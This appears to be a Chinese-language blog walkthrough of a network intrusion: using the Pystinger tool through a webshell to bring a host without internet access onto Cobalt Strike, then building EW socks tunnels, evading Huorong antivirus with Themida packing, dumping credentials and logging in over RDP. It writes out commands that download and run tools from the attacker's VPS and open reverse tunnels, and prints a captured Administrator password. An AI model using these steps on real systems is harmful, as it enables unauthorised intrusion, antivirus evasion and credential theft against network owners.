Pystinger上线不出网机器

简介: Pystinger上线不出网机器

01 使用场景


毒刺(Pystinger)通过webshell搭建内网socks4代理,可用于上线CobaltStrike,此方法适用于目标主机不出网但存在web应用可被互联网访问的情况



02 拓扑结构


03  使用方法


下载地址:


https://github.com/FunnyWolf/pystinger



  1. 拿下第一层网络后,上传webshell到机器上。


访问http://靶机VPS:7777/proxy.php


此时页面出现UTF-8即为成功。

  1. stinger_server上传到目标服务器并开启服务端等待客户端连接


可能是因为文件太大,压缩之后还是没法传

这里使用命令行远程Wget来下载到目标服务器上。


在自己的VPS上搭建一个server   python3 -m http.server 1234

在目标服务器上使用wget来下载  


wget http://自己的VPS:1234/stinger_server




然后执行

chmod 700 stinger_server

   

./stinger_server 0.0.0.0


在自己的VPS服务器上执行


./stinger_client -w http://自己的VPS:7777/proxy.php -l 127.0.0.1 -p 60000


此时目标机的60020端口已经映射到了VPS的60020端口了。


在VPS上启动CS的服务端,然后设置监听,其中HTTP Hosts为目标机的ip地址,端口默认60020


目标机网络:192.168.99.110

10.0.1.135



这里是目标机的内网IP地址


生成木马


保存等待上传到内网机



04  代理到内网机


先在目标机执行ew


./ew_for_linux64  -s rssocks -d 自己的VPS -e 4399



然后在VPS上执行ew



./ew_for_linux64 -s rcsocks -l 1080 -e 4399




设置代理之后即可访问内网





拿下webshell权限之后,使用蚁剑连接,准备传exe

配置蚁剑代理,重启




05  免杀火绒登陆3389


然后上传exe上去,但是由于内网机有火绒,所以在这里需要免杀处理。

使用Themida加壳免杀。



上传至内网机。



然后运行程序,上线成功



抓密码:



用户名:Administrator

密码:!QW@34567


检测3389是否开启


端口是3389,设置代理直接登陆。


使用Proxifiler


登陆成功。



相关文章
|
SQL 监控 网络协议
线上故障如何快速排查?来看这套技巧大全
有哪些常见的线上故障?如何快速定位问题?本文详细总结工作中的经验,从服务器、Java应用、数据库、Redis、网络和业务六个层面分享线上故障排查的思路和技巧。较长,同学们可收藏后再看。
线上故障如何快速排查?来看这套技巧大全
|
3月前
|
调度
项目环境测试问题之单机调度会导致项目环境大部分的机器被闲置如何解决
项目环境测试问题之单机调度会导致项目环境大部分的机器被闲置如何解决
|
运维 Java 调度
预发部署时机器总是重启两次的“简单”排查
本文只是总结下线上问题的排查过程,不讲方法论,没有大道理,行文会较为随意,注重的是排查思路,希望对同学们日常研发工作有所帮助~
107832 25
|
监控 前端开发 测试技术
让项目顺利上线:做好转测试与上线准备
转测试是项目上线前最后一道坎,需求全部做完并自测后,项目就进入了转测试阶段
590 0
让项目顺利上线:做好转测试与上线准备
生产环境出问题了,研发要不要罚钱?
生产环境出问题了,研发要不要罚钱?
146 0
|
数据采集 小程序 数据挖掘
我们的小程序上线啦!
还只是个demo,在线运行 python 代码。可以加载运行几个例程,也可以自己输入代码。但受小程序功能所限,不能够自动补全啥的。
|
监控 开发者 Scala
对本地机器进行监控的解决方案 | 学习笔记
快速学习对本地机器进行监控的解决方案
对本地机器进行监控的解决方案 | 学习笔记
|
SQL Java 数据库连接
线上运行的项目突然变得很卡如何排查?
线上运行的项目突然变得很卡如何排查?
|
JSON 运维 网络协议
平稳运行半年的系统宕机了,记录一次排错调优的全过程!
最近发生了一件很让人头疼的事情,已经上线半年且平稳运行半年系统在年后早高峰的使用时发生了濒临宕机的情况。访问速度特别慢,后台查到大量time_wait的连接,从代码层面到架构层面到网络层面排查了几天几夜,总算是有了结果。
WM
|
存储 缓存 固态存储
工作当中我所解决的一个线上问题
不算是印象最深刻,印象最深刻的没办法拿出来说,手动狗头。不过这个问题也是花费了我一番功夫的,这里分享出来供大家查看。
WM
1162112 0
工作当中我所解决的一个线上问题